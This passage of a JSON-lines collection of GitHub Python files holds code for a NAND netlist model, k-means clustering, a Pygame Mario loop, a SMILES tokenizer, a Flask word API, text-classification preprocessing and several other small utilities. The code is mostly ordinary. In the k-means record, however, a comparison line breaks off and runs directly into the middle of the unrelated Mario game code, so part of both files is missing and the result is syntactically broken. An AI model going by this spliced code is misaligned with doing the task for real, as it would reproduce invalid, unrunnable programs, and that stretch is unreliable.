self.invert = invert\n\n def assign(self, comp, _part_lib):\n ''' Assigned to component '''\n seen = set()\n ninputs = 0\n rnodes = list(comp)\n for node in rnodes:\n # > 2 is special case for IOC::IPNOR0C etc.\n if node.net.is_pu() and len(rnodes) > 2:\n # print(\"Eliminating NAND PU input\", node)\n node.remove()\n continue\n if node.net in seen:\n # print(\"Eliminating NAND input\", node)\n node.remove()\n continue\n seen.add(node.net)\n if node.pin.name == \"Q\":\n node.pin.set_role(\"output\")\n else:\n node.pin.set_role(\"input\")\n ninputs += 1\n if not ninputs:\n print(\"NAND with no inputs left\", ninputs, comp)\n for i in rnodes:\n print(\" \", i)\n assert ninputs\n\n def configure(self, comp, part_lib):\n i = []\n j = 0\n for node in list(comp):\n if node.pin.name != \"Q\":\n node.pin.name = \"D%d\" % j\n j += 1\n if node.net.sc_type == \"bool\":\n i.append(\"B\")\n else:\n i.append(\"L\")\n inputs = len(comp.nodes) - 1\n sig = util.signature(i)\n ident = \"AND%d_\" % inputs + \"%d_\" % self.delay + sig\n if self.invert:\n ident = \"N\" + ident\n if ident not in part_lib:\n part_lib.add_part(ident, Nand(ident, inputs, self.delay, self.invert))\n comp.part = part_lib[ident]\n\ndef register(part_lib):\n ''' Register component model '''\n\n part_lib.add_part(\"F00\", ModelNand(0, True))\n part_lib.add_part(\"F04\", ModelNand(5, True))\t# Inverters are juvenile NAND gates\n part_lib.add_part(\"F08\", ModelNand(0, False))\n part_lib.add_part(\"F37\", ModelNand(5, True))\n part_lib.add_part(\"F10\", ModelNand(0, True))\n part_lib.add_part(\"F20\", ModelNand(0, True)) ### Not: OC-thing with ALU-ZERO outputs\n part_lib.add_part(\"F30\", ModelNand(0, True))\n part_lib.add_part(\"F40\", ModelNand(0, True))\n part_lib.add_part(\"F133\", ModelNand(0, True))\n part_lib.add_part(\"AND4\", ModelNand(0, False))\n part_lib.add_part(\"AND3\", ModelNand(0, False))\n part_lib.add_part(\"AND2\", ModelNand(0, False))\n","repo_name":"Datamuseum-DK/R1000.Emulator","sub_path":"NetList/model_nand.py","file_name":"model_nand.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} 
+{"seq_id":"73492607185","text":"class Point:\n\t\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\t\t\n\tdef __repr__(self):\n\t\treturn f\"Point({self.x}, {self.y})\"\n\t\n\tdef __add__(self, other):\n\t\treturn Point(self.x +other.x, self.y+other.y)\n\tdef __neg__(self):\n\t\treturn Point(-self.x, -self.y)\n\t\t\n\tdef __sub__(self, other):\n\t\tnew = other.__neg__()\n\t\treturn self.__add__(new)\n\t\t\n\tdef __mul__(self, other):\n\t\tif isinstance(other, (int, float)):\n\t\t\treturn Point(self.x *other, self.y *other)\n\t\telse: # dot product\n\t\t\treturn self.x*other.x + self.y*other.y\n\t\t\t\n\tdef distance(self, other):\n\t\tp = self - other\n\t\treturn (p.x**2 +p.y**2)**0.5\n\nclass Cluster(object):\n\t\t\n\t\tdef __init__(self, x, y):\n\t\t\tself.center = Point(x, y)\n\t\t\tself.points = []\n\t\t\n\t\tdef update(self):\n\t\t\t\n\t\t\tx_c = sum([point.x for point in self.points])/len(self.points)\n\t\t\ty_c = sum([point.y for point in self.points])/len(self.points)\n\t\t\t\n\t\t\tself.center = Point(x_c, y_c)\n\t\t\tself.points = []\n\t\t\t\n\t\tdef add_point(self, point):\n\t\t\tself.points.append(point)\n\t\t\t\ndef kmean(pointss):\n\t\t\tpoints = [Point(*point) for point in pointss]\n\t\t\tc1 = Cluster(1,0)\n\t\t\tc2 = Cluster(-1,0)\n\t\t\tc1_old = []\n\t\t\tfor _ in range(10000):\n\t\t\t\tfor point in points:\n\t\t\t\t\tif point.distance(c1.center)= 0):\n self.level.mario.move(dirs[STOP]) # Stops, only if still moving the direction of key released\n elif d == UP:\n self.level.mario.jumping = False\n elif d == DOWN:\n self.level.mario.toggle_duck()\n if e.type == pg.KEYDOWN:\n if e.key in dir_keys:\n d = dir_keys[e.key]\n if d == LEFT or d == RIGHT:\n print(d)\n self.level.mario.move(dirs[d])\n elif d == UP:\n # self.level.mario.jump()\n self.level.mario.jumping = True\n elif d == DOWN:\n self.level.mario.toggle_duck()\n elif e.key == pg.K_RETURN:\n self.level.mario.change_state((self.level.mario.state + 1) % 3)\n # print(self.bg_color)\n\n def play(self):\n while not self.finished:\n self.check_events()\n self.update()\n self.draw()\n self.deltaTime = self.clock.tick(self.settings.fps) # FPS cap\n print(\"GAME OVER! 
EXITING...\")\n exit()\n","repo_name":"ZachHofmeister/Pygame-Mario","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44520856920","text":"import numpy as np\nimport pandas as pd\n\ndef parse_colors_config(colors_config):\n\n colors = pd.read_csv(colors_config, sep=' ')\n print(colors)\n\n \n Colors_config = {}\n\n for i in range(len(colors['colorname'])):\n Colors_config[colors['colorname'][i]] = [(colors['lowerH'][i], colors['lowerS'][i], colors['lowerV'][i]), (colors['upperH'][i], colors['upperS'][i], colors['upperV'][i])]\n\n return Colors_config\n\ndef detect_segment(mask):\n \n\n mask_xproj = [np.max(i) for i in mask.T]\n \n edges = []\n \n up = max(mask_xproj)\n down = np.min(mask_xproj) - np.max(mask_xproj)\n \n for i in range(1, len(mask_xproj)):\n \n if i == 1 and mask_xproj[i-1] == up:\n start = i\n if mask_xproj[i] - mask_xproj[i-1] == up:\n start = i\n if mask_xproj[i] - mask_xproj[i-1] == down:\n edges.append((start, i))\n Segments = []\n Segments_edges = []\n for edge in edges:\n \n V_segment = mask.T[edge[0]:edge[1]].T\n if len(V_segment[0]) == 0:\n continue\n current_segment = None\n for i in range(len(V_segment)):\n line = V_segment[i]\n \n if i == len(V_segment) - 1 and current_segment != None:\n Segments_edges.append((edge[0]-1, edge[1], left-1, i))\n \n if max(line) == 0:\n \n if current_segment == None:\n continue\n Segments.append(current_segment)\n Segments_edges.append((edge[0]-1, edge[1], left-1, i))\n current_segment = None\n continue\n \n if current_segment == None:\n current_segment = [line]\n left = i\n \n else:\n current_segment.append(line)\n return Segments_edges\n \n\n","repo_name":"DNKonanov/gimnastics_analisys","sub_path":"color_label/colors_processing.py","file_name":"colors_processing.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45103414086","text":"import pytest\nfrom random import randint\n\n\nclass TestLogin:\n\n def test_login1(self):\n print(\"这是测试1\")\n assert 1\n\n @pytest.mark.run(order=1)\n def test_login2(self):\n num = randint(1, 5)\n if num == 1:\n assert 1\n else:\n assert 0\n","repo_name":"lujun2019/test_scrip","sub_path":"pytest_test/scripts/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15129187931","text":"\"\"\"\nDefinitions labels.\n\"\"\"\n\nfrom PyQt6.QtWidgets import QLabel\nfrom PyQt6.QtGui import QFont\n\n\nclass Definition(QLabel):\n \"\"\"Word definition label.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.set_ui()\n\n def set_ui(self):\n \"\"\"Set user interface.\"\"\"\n\n self.setMinimumHeight(100)\n self.setWordWrap(True)\n self.setFont(QFont('Helvetica', 10))\n self.setStyleSheet('background-color: #fefcf9;')\n","repo_name":"rivka-levit/english-dictionary-gui","sub_path":"gui/definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"131601339","text":"# -*- encoding: utf-8 -*-\n'''\nFilename :tokenizer.py\nDescription :分词工具\nTime :2023/07/26 15:14:04\nAuthor :daiyizheng\nEmail :387942239@qq.com\nVersion :1.0\n'''\nfrom __future__ import annotations, print_function\nimport 
abc\nfrom typing import Dict, Text, Tuple, Union, List\n\nfrom mio import write_json_to_file, read_json\nimport torch\n\nclass Tokenizer(abc.ABC):\n \"\"\"\n Tokenizer class for converting smiles to tokens.\n \"\"\"\n def __init__(self, \n vocab_list,\n bos_token: Text = '',\n eos_token: Text = '',\n pad_token: Text = '',\n unk_token: Text = '',\n **kwargs\n ):\n self.__vocab_list = vocab_list\n self.__bos_token=bos_token\n self.__eos_token=eos_token\n self.__pad_token=pad_token\n self.__unk_token=unk_token\n\n @property\n def vocab_list(self) -> list:\n return self.__vocab_list\n\n @property\n def bos_token_ids(self):\n return self.token_to_id[self.__bos_token]\n \n @property\n def bos_token(self):\n return self.__bos_token\n \n @property\n def eos_token_ids(self):\n return self.token_to_id[self.__eos_token]\n\n @property\n def eos_token(self):\n return self.__eos_token\n\n @property\n def unk_token_ids(self):\n return self.token_to_id[self.__unk_token]\n\n @property\n def unk_token(self):\n return self.__unk_token\n\n @property\n def pad_token_ids(self):\n return self.token_to_id[self.__pad_token]\n\n @property\n def pad_token(self):\n return self.__pad_token\n\n def tokenize(self, smiles: str) -> list:\n \"\"\"\n Tokenize smiles.\n \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def convert_token_to_ids(self, token:Text):\n \"\"\"\n Covert token to ids.\n \"\"\"\n raise NotImplementedError\n \n @abc.abstractmethod\n def convert_ids_to_token(self, ids:int):\n \"\"\"\n Covert ids to token.\n \"\"\"\n raise NotImplementedError\n \n @abc.abstractmethod\n def save_config(self, path: Text) -> None:\n raise NotImplementedError\n \n @classmethod\n def load_config_from_path(cls, *args, **kwargs):\n raise NotImplementedError\n \n @classmethod\n def load_config(cls, *args, **kwargs):\n raise NotImplementedError\n\n def __call__(self, smiles: str) -> list:\n return self.tokenize(smiles)\n\n def __repr__(self) -> str:\n return f\"{self.__class__.__name__}()\"\n\n\nclass CharTokenizer(Tokenizer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n all_syms = self.vocab_list + [self.bos_token, self.eos_token, self.pad_token, self.unk_token]\n self.token_to_id = {c: i for i, c in enumerate(all_syms)}\n self.id_to_token = {i: c for i, c in enumerate(all_syms)}\n \n @staticmethod\n def tokenize(smiles: Text\n ) -> List:\n \"\"\"\n Tokenize smiles.\n \n Args:\n smiles: smiles string\n Returns:\n tokenized list\n \"\"\"\n return [c for c in smiles]\n \n @staticmethod\n def from_data(data:Union[List[Text], Tuple],\n bos_token:Text = '', \n eos_token:Text = '',\n pad_token:Text = '',\n unk_token:Text = '',\n **kwargs):\n \"\"\"\n load vocab list from smiles\n Args:\n data: smiles list\n bos_token: token\n eos_token: token\n pad_token: token\n unk_token: token\n **kwargs: other arguments\n Returns: Tongkenizer object\n \"\"\"\n vocab_list = set()\n for string in data:\n vocab_list.update(string)\n vocab_list = sorted(list(vocab_list))\n \n CharTokenizer.check_special_tokens(vocab_list, bos_token, eos_token, pad_token, unk_token)\n config = {\n \"vocab_list\":vocab_list,\n \"bos_token\":bos_token,\n \"eos_token\":eos_token,\n \"pad_token\":pad_token,\n \"unk_token\":unk_token\n }\n return CharTokenizer.load_config(config=config, **kwargs)\n\n def save_config(self, filename: Text) -> None:\n \"\"\"\n Save config to file.\n Args:\n filename: config file path\n \"\"\"\n tokenizer_config = {\n \"name\": self.__class__.__name__,\n \"bos_token\" : self.bos_token,\n \"eos_token\" : 
self.eos_token,\n \"pad_token\" : self.pad_token,\n \"unk_token\" : self.unk_token,\n \"vocab_list\" : self.vocab_list\n }\n ## save to json file\n write_json_to_file(filename=filename, obj=tokenizer_config)\n\n def convert_token_to_ids(self, token:Text) -> int:\n \"\"\"\n Covert token to ids.\n \n Args:\n token: token\n Returns:\n ids\n \"\"\"\n return self.token_to_id.get(token, self.unk_token_ids)\n\n def convert_ids_to_token(self, ids: int):\n \"\"\"\n Covert ids to token\n \n Args:\n ids: ids\n Returns:\n token\n \"\"\"\n return self.id_to_token.get(ids, self.unk_token)\n \n def string_to_ids(self, \n string:Text, \n is_add_bos_eos_token_ids:bool=True):\n token_ids = [self.convert_token_to_ids(s) for s in string]\n if is_add_bos_eos_token_ids:\n token_ids = [self.bos_token_ids] + token_ids + [self.eos_token_ids]\n return token_ids\n\n def ids_to_string(self, \n ids:int, \n is_del_bos_eos_token:bool=True):\n if isinstance(ids, torch.Tensor):\n ids = ids.tolist()\n if is_del_bos_eos_token:\n ids = ids[1:]\n ids = ids[:-1]\n return \"\".join([self.convert_ids_to_token(i) for i in ids])\n\n @staticmethod\n def check_special_tokens(vocab_list:List, \n bos_token:Text, \n eos_token:Text, \n pad_token:Text,\n unk_token:Text):\n if (bos_token in vocab_list) or (eos_token in vocab_list) or \\\n (pad_token in vocab_list) or (unk_token in vocab_list):\n raise ValueError('SpecialTokens in chars')\n\n @classmethod\n def load_config_from_path(cls, path):\n config = read_json(path)\n return cls.load_config(config=config)\n \n \n @classmethod\n def load_config(cls, config:Dict, **kwargs) -> Tokenizer:\n \n \"\"\"\n Load tokenizer from config file.\n {\n \"name\":xxTokenizer,\n \"bos_token\" : \"\",\n \"eos_token\" : '',\n \"pad_token\" : '',\n \"unk_token\" : '',\n \"vocab_list\" : []\n }\n \"\"\"\n vocab_list = config[\"vocab_list\"]\n bos_token = config[\"bos_token\"] if config[\"bos_token\"] else None\n eos_token = config[\"eos_token\"] if config[\"eos_token\"] else None\n pad_token = config[\"pad_token\"] if config[\"pad_token\"] else None\n unk_token = config[\"unk_token\"] if config[\"unk_token\"] else None\n cls.check_special_tokens(vocab_list, bos_token, eos_token, pad_token, unk_token)\n\n return cls(vocab_list=vocab_list, \n bos_token=bos_token,\n eos_token=eos_token,\n pad_token=pad_token,\n unk_token=unk_token,\n **kwargs)\n \n def __len__(self):\n return len(self.token_to_id)\n\n \n# if __name__ == '__main__':\n# import pandas as pd\n# df = pd.read_csv(\"/DYZ/dyz1/custom_package/drugflow/examples/datasets/train.csv\")\n# smiles = df[\"SMILES\"].to_numpy()\n# tokenize = CharTokenizer.from_data(smiles)\n# tokenize.save_config(\"./test.json\")\n# t = CharTokenizer.load_config_from_path(\"./test.json\")\n# print(t)","repo_name":"daiyizheng/mol_gen","sub_path":"tokenizers/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":8128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40802693189","text":"import bpy\nimport math\n\ndef RGBtoHSV(R,G,B):\n\t# min, max, delta;\n\tmin_rgb = min( R, G, B )\n\tmax_rgb = max( R, G, B )\n\tV = max_rgb\n\n\tdelta = max_rgb - min_rgb\n\tif not delta:\n\t\tH = 0\n\t\tS = 0\n\t\tV = R # RGB are all the same.\n\t\treturn H,S,V\n\n\telif max_rgb: # != 0\n\t\tS = delta / max_rgb\n\telse:\n\t\tR = G = B = 0 # s = 0, v is undefined\n\t\tS = 0\n\t\tH = 0 # -1\n\t\treturn H,S,V\n\n\tif R == max_rgb:\n\t\tH = ( G - B ) / delta # between yellow & magenta\n\telif G == max_rgb:\n\t\tH = 2 
+ ( B - R ) / delta # between cyan & yellow\r\n\telse:\r\n\t\tH = 4 + ( R - G ) / delta # between magenta & cyan\r\n\r\n\tH *= 60 # degrees\r\n\tif H < 0:\r\n\t\tH += 360\r\n\r\n\tH = H * (math.pi / 180.0)\r\n\t\r\n\treturn H,S,V\r\n\r\ndef colHSVDist(col1, col2):\r\n\t\"\"\"\r\n\tCalculates the distance between two colors in the HSV space\r\n\t:param col1: First HSV color\r\n\t:type col1: list\r\n\t:param col2: Second HSV color\r\n\t:type col2: list\r\n\t\"\"\"\r\n\treturn math.pow((math.cos(col1[0]) * col1[1]) - (math.cos(col2[0]) * col2[1]), 2.0) + math.pow((math.sin(col1[0]) * col1[1]) - (math.sin(col2[0]) * col2[1]), 2.0)","repo_name":"TheFamousRat/MasterThesis2021","sub_path":"src/basicUtils.py","file_name":"basicUtils.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41644687400","text":"import sqlite3\nfrom pathlib import Path\n\ndatabase_dir_name = 'database'\ndatabase_file_name = 'example.db'\n\ndef create_tables(cur):\n    # Create table\n    try:\n        cur.execute('''CREATE TABLE product \n                    (description text, price text)''')\n    except sqlite3.OperationalError:  # e.g. the table already exists\n        return False\n    else:\n        return True\n\ndef re_create_tables(cur):\n    # Drop and then Create table\n    try:\n        cur.execute('''DROP TABLE product''')\n        cur.execute('''CREATE TABLE product \n                    (description text, price text)''')\n    except sqlite3.OperationalError:\n        return False\n    else:\n        return True\n\n\ndef init_database():\n    Path(f\"{database_dir_name}\").mkdir(parents=True, exist_ok=True)\n    con = sqlite3.connect(f\"{database_dir_name}/{database_file_name}\")\n    cur = con.cursor()\n\n    if not create_tables(cur):\n        re_create_tables(cur)\n\n    con.close()\n","repo_name":"yeeeshiuan/shopee_crawler","sub_path":"db_function.py","file_name":"db_function.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12453345483","text":"# coding: utf-8\r\n\r\nfrom flask import Blueprint, request, jsonify\r\nfrom . 
import match_service\n\nwords_blueprint = Blueprint('word', __name__)\n\n\n@words_blueprint.route('/', methods=('GET', ))\ndef home():\n    return jsonify(\n        {\n            'API': [\n                '/closest_word',\n                '/proximity'\n            ]\n        }\n    )\n\n\n@words_blueprint.route('/closest_word', methods=('GET', ))\ndef closest_word():\n    possibilities = request.args.get('possibilities').split(',')\n    word = request.args.get('word')\n    closest_word = match_service.get_close_matches(word, possibilities)\n    return jsonify({\n        'closest_word': closest_word\n    })\n\n\n@words_blueprint.route('/proximity', methods=('GET', ))\ndef proximity():\n    word_a, word_b = request.args.get('word_a'), request.args.get('word_b')\n    proximity = match_service.get_proximity(word_a, word_b)\n    return jsonify({\n        'proximity': proximity\n    })\n","repo_name":"IuryAlves/flask_getting_started","sub_path":"example_6/words/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36700768686","text":"\nimport emoji\nimport json\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nfrom wordsegment import load, segment\nfrom sklearn.utils import class_weight\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.preprocessing import LabelBinarizer, LabelEncoder\n\nimport pickle\nload()\n\ndef check_iflabels_doesnotexist(df, task_type):\n    if not get_taskname(task_type) in df.columns:\n        df[get_taskname(task_type)] = [\"-1\"]*df.shape[0]\n    return df\n\ndef space_special_chars(wrd):\n    return ''.join(e if (e.isalnum() or e==\" \") else f\" {e} \" for e in wrd)\n\ndef segment_hashtags(stg):\n    if \"#\" in stg:\n        words = stg.split()\n        words = [\" \".join(segment(wrd)) if '#' in wrd else wrd for wrd in words]\n        stg = \" \".join(words)\n    return stg\n\n\ndef read_corpus(filename = \"data/train.tsv\", delimiter = \",\", task_type = \"A\"):\n    print(filename, delimiter)\n    df = pd.read_csv(filename, sep=delimiter)\n\n    df['preprocessed_text'] = df['text'].str.replace(r'&', r'and', regex=True)\n\n    # Hashtags\n    df['preprocessed_text'] = df['preprocessed_text'].apply(segment_hashtags)\n    df['preprocessed_text'] = df['preprocessed_text'].str.lower()\n\n    df['preprocessed_text'] = df['preprocessed_text'].apply(space_special_chars)\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r' +', r' ', regex=True)\n\n    # replace [URL] placeholders with \"http\" (brackets escaped so the pattern is not read as a regex character class)\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r'\\[URL\\]', \"http\", regex=True)\n\n    # removal of @USER token\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r'(@USER\\s*){4,}','@USER @USER @USER ', regex=True)\n\n    # replace numbers by [NUM] token\n    df[\"preprocessed_text\"] = df[\"preprocessed_text\"].str.replace(r\"([0-9]+[.,]*[0-9]+)\", \"[NUM]\", regex=True)\n    \n    # Emoji to natural language\n    df['preprocessed_text'] = df['preprocessed_text'].apply(emoji.demojize)\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r':(\\w+):', r'\\g<1>', regex=True)\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r'_', r' ', regex=True)\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r':', r' ', regex=True)\n\n    df['preprocessed_text'] = df['preprocessed_text'].str.replace(r' +', r' ', regex=True)\n\n    # df[[\"preprocessed_text\", \"label\"]].to_csv(filename+'.check')\n    reviews = df['preprocessed_text'].values.tolist()\n    check_iflabels_doesnotexist(df, task_type)\n    labels = 
df[get_taskname(task_type)].values.tolist()\n ids = df['rewire_id'].values.tolist()\n return ids, reviews, labels\n\n\ndef get_taskname(task_type = \"A\"):\n class_mapdict = {\"A\": \"label_sexist\",\n \"B\": \"label_category\",\n \"C\": \"label_vector\"}\n return class_mapdict[task_type]\n\ndef calculate_confusion_matrix(Y_test, y_pred, labels):\n matrix = confusion_matrix(Y_test, y_pred)\n # Convert to pandas dataframe confusion matrix.\n matrix = (pd.DataFrame(matrix, index=labels, columns=labels))\n return matrix\n\n\ndef plot_confusion_matrix(matrix):\n fig, _ = plt.subplots(figsize=(9, 8))\n sn.heatmap(matrix, annot=True, cmap=plt.cm.Blues, fmt='g')\n # show the picture\n plt.show()\n fig.savefig(\"heatmap.png\")\n return\n\ndef compute_class_weights(encoder, Y_train):\n class_weightscores = class_weight.compute_class_weight(class_weight = 'balanced'\n ,classes = encoder.classes_\n ,y = Y_train)\n return class_weightscores\n\ndef create_class_weights(Y_train, encoder):\n class_weightscores = compute_class_weights(encoder, Y_train)\n classname2id = dict((name, ix) for (ix, name) in enumerate(encoder.classes_))\n class_weights = dict( (k,v) for (k,v) in zip(encoder.classes_, class_weightscores))\n print(f\"Class weights are {class_weights}\")\n class_weights = dict( (classname2id[k],v) for (k,v) in class_weights.items())\n print(f\"Class weights are {class_weights}\")\n return class_weights\n\ndef write_preds(ids, Y_pred, filename):\n \"\"\"Write test predictions along with inputs and expected outputs\n Args:\n X_test (List): Text test sentences\n Y_test (List): Labels of test dataset\n Y_pred (List): Labels predicted\n \"\"\"\n txtt = []\n for idd, yprd in zip(ids, Y_pred):\n txtt.append([yprd, idd])\n\n txtt = pd.DataFrame(txtt, columns=[\"label_pred\",\"rewire_id\"] )\n txtt.to_csv(filename, index=False)\n\ndef get_preds(model, X_test, task_type, encoder):\n '''Do predictions'''\n # Get predictions using the trained model\n try:\n Y_pred = model.predict(X_test).logits # For BERT\n except:\n Y_pred = model.predict(X_test)\n # Finally, convert to numerical labels to get scores with sklearn\n Y_pred = np.argmax(Y_pred, axis=1)\n # If you have gold data, you can calculate accuracy\n\n Y_pred = [encoder.classes_[el] for el in Y_pred]\n return Y_pred\n\ndef test_set_predict(model, X_test, Y_test,\n ident, encoder, showplot,\n task_type):\n Y_pred = get_preds(model, X_test, task_type, encoder)\n\n if task_type == \"A\":\n Y_test = [el[0] for el in list(Y_test)]\n else:\n Y_test = np.argmax(Y_test, axis=1)\n\n Y_test = [encoder.classes_[el] for el in Y_test]\n\n print('Accuracy on own {1} set: {0}'.format(round(accuracy_score(Y_test, Y_pred), 3), ident))\n print('Macro-F1 on own {1} set: {0}'.format(round(f1_score(Y_test, Y_pred, average=\"macro\"), 3), ident))\n if showplot:\n # get the classnames from encoder\n classnames = encoder.classes_\n matrix = calculate_confusion_matrix(Y_test, Y_pred, classnames)\n plot_confusion_matrix(matrix)\n return Y_pred, Y_test\n\ndef save_picklefile(inp_object, filename):\n with open(filename, \"wb\") as fh:\n pickle.dump(inp_object, fh)\n\ndef load_picklefile(filename):\n with open(filename, \"rb\") as fh:\n saved_obj = pickle.load(fh)\n return saved_obj\n\ndef numerize_labels(Y_train, Y_dev, task_type = \"A\"):\n # Transform string labels to one-hot encodings\n encoder = LabelBinarizer()\n Y_train_bin = encoder.fit_transform(Y_train) # Use encoder.classes_ to find mapping back\n Y_dev_bin = encoder.transform(Y_dev)\n return encoder, Y_train_bin, 
Y_dev_bin\n\ndef numerize_labels_pytorch(Y_train, Y_dev):\n # Transform string labels to one-hot encodings\n encoder = LabelEncoder()\n encoder.fit(Y_train) # Use encoder.classes_ to find mapping back\n Y_train_bin = encoder.transform(Y_train)\n Y_dev_bin = encoder.transform(Y_dev)\n return encoder, Y_train_bin, Y_dev_bin\n\n\ndef filter_none_class(ids, reviews, labels):\n new_list_id = []\n new_list_text = []\n new_list_label = []\n for id, review, lbl in zip(ids, reviews, labels):\n if lbl != \"none\":\n new_list_text.append(review)\n new_list_label.append(lbl)\n new_list_id.append(id)\n return new_list_id, new_list_text, new_list_label\n\ndef read_json_default(filename):\n if filename==\"\": return {}\n data = read_json(filename)\n return data\n\ndef read_json(filename):\n with open(filename, 'r') as fp:\n data = json.load(fp) \n return data\n\ndef extract_features(ids, filename1, filename2, filename3):\n localfeatures = [[]*len(ids)]\n jsondata1 = read_json_default(filename1)\n jsondata2 = read_json_default(filename2)\n jsondata3 = read_json_default(filename3)\n localfeatures = [ jsondata1.get(sntid,[])+jsondata2.get(sntid,[])+jsondata3.get(sntid,[]) for sntid in ids ]\n localfeatures = np.array(localfeatures)\n return localfeatures\n\ndef read_data(train_file, dev_file, task_type):\n # Read in the data\n train_ids, X_train, Y_train = read_corpus(train_file, \",\", task_type)\n dev_ids, X_dev, Y_dev = read_corpus(dev_file, \",\", task_type)\n if task_type != \"A\":\n train_ids, X_train, Y_train = filter_none_class(train_ids, X_train, Y_train)\n dev_ids, X_dev, Y_dev = filter_none_class(dev_ids, X_dev, Y_dev)\n\n return train_ids, X_train, Y_train, dev_ids, X_dev, Y_dev\n\n\nFEATURE_NAMES = { \"empath\":[ \"sexism\", \"violence\", \"money\", \"valuable\" \"domestic work\", \"hate\", \"aggression\", \"anticipation\", \"crime\", \"weakness\",\n \"horror\", \"swearing terms\", \"kill\", \"sexual\", \"cooking\",\n \"exasperation\", \"body\", \"ridicule\", \"disgust\", \"anger\", \"rage\"],\n\n \"papi\": [\"flirtation\", \"identity_attack\", \"insult\", \"obscene\", \"profanity\",\n \"severe_toxicity\", \"sexually_explicit\", \"threat\", \"toxicity\"],\n \n \"hurtlex\": [\"negative stereotypes and ethnic slurs\",\n \"professions and occupations\",\n \"physical disabilities and diversity\",\n \"cognitive disabilities and diversity\",\n \"female genitalia\",\n \"words related to prostitution\",\n \"words related to homosexuality\",\n \"with potential negative connotations\",\n \"derogatory words\",\n \"male genitalia\"]}\n\ndef load_features_file(filename):\n with open(filename, 'r') as fh:\n features_perid = json.load(fh)\n return features_perid\n\ndef add_features_to_sents(ids, sents, split_name,\n filename, feature_name,\n FEATURE_THRESHOLDS = { \"empath\": 0, \"hurtlex\": 0, \"papi\": 0.5}):\n features_perid = load_features_file(filename.replace(\".json\", f\"_{split_name}.json\"))\n featurenames = FEATURE_NAMES[feature_name]\n new_sentences = []\n for id, snt in zip(ids, sents):\n local_features = []\n extra_sent = []\n snt_features = features_perid[id]\n for ind_feat, feat_name in zip(snt_features, featurenames):\n if ind_feat>FEATURE_THRESHOLDS[feature_name]:\n local_features.append(feat_name)\n\n if len(local_features)==0:\n extra_sent = [\"None\"]\n else:\n extra_sent = extra_sent + list(set(local_features))\n new_sentences.append(f\"{snt}. 
{feature_name} features : {', '.join(extra_sent)}\")\n\n return ids, new_sentences\n\ndef append_feat_totraindev(features_file, train_ids, X_train,\n dev_ids, X_dev, feature_name,\n threshold_values):\n if features_file:\n train_ids, X_train = add_features_to_sents(train_ids, X_train, \"train\",\n features_file, feature_name,\n threshold_values)\n dev_ids, X_dev = add_features_to_sents(dev_ids, X_dev, \"dev\",\n features_file, feature_name,\n threshold_values)\n return train_ids, X_train, dev_ids, X_dev\n","repo_name":"SanneW7/Shared-Task-","sub_path":"models-code/systems/neural/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31080484365","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def getDirections(self, root: Optional[TreeNode], startValue: int, destValue: int) -> str:\n startPath,destPath = \"\",\"\"\n path = []\n def dfs(node):\n nonlocal startPath,destPath\n if node is None:\n return\n \n if node.val == startValue:\n startPath = \"\".join(path)\n if node.val == destValue:\n destPath = \"\".join(path)\n path.append(\"R\")\n dfs(node.right)\n path.pop()\n path.append(\"L\")\n dfs(node.left)\n path.pop()\n \n dfs(root)\n \n i = 0\n while i DataFrame:\n s = requests.Session()\n s.headers.update({\n 'user-agent': 'Mozilla/5.0'\n })\n r = s.post(HASHTAG_SCHEDULE)\n soup = BeautifulSoup(r.text, 'html.parser')\n inputs = soup.find_all('input', {'type': 'submit', 'class': 'btn'})\n\n options = list(map(lambda input: {\n 'value': input['value'],\n 'script_id': input['name']\n }, inputs))[2::]\n\n form = {}\n for input in soup.find_all('input', {'type': 'hidden'}):\n form[input['name']] = input.get('value') if input.get('value') is not None else ''\n\n form['ctl00$ScriptManager1'] = 'ctl00$ContentPlaceHolder1$UpdatePanel1|' + options[week-1]['script_id']\n form[options[week - 1]['script_id']] = options[week-1]['value']\n r = s.post(HASHTAG_SCHEDULE, data=form)\n soup = BeautifulSoup(r.text, 'html.parser')\n\n schedule_table = soup.find('div', {'class': 'table-responsive'}).find('table')\n # get schedule table and turn into df\n df = 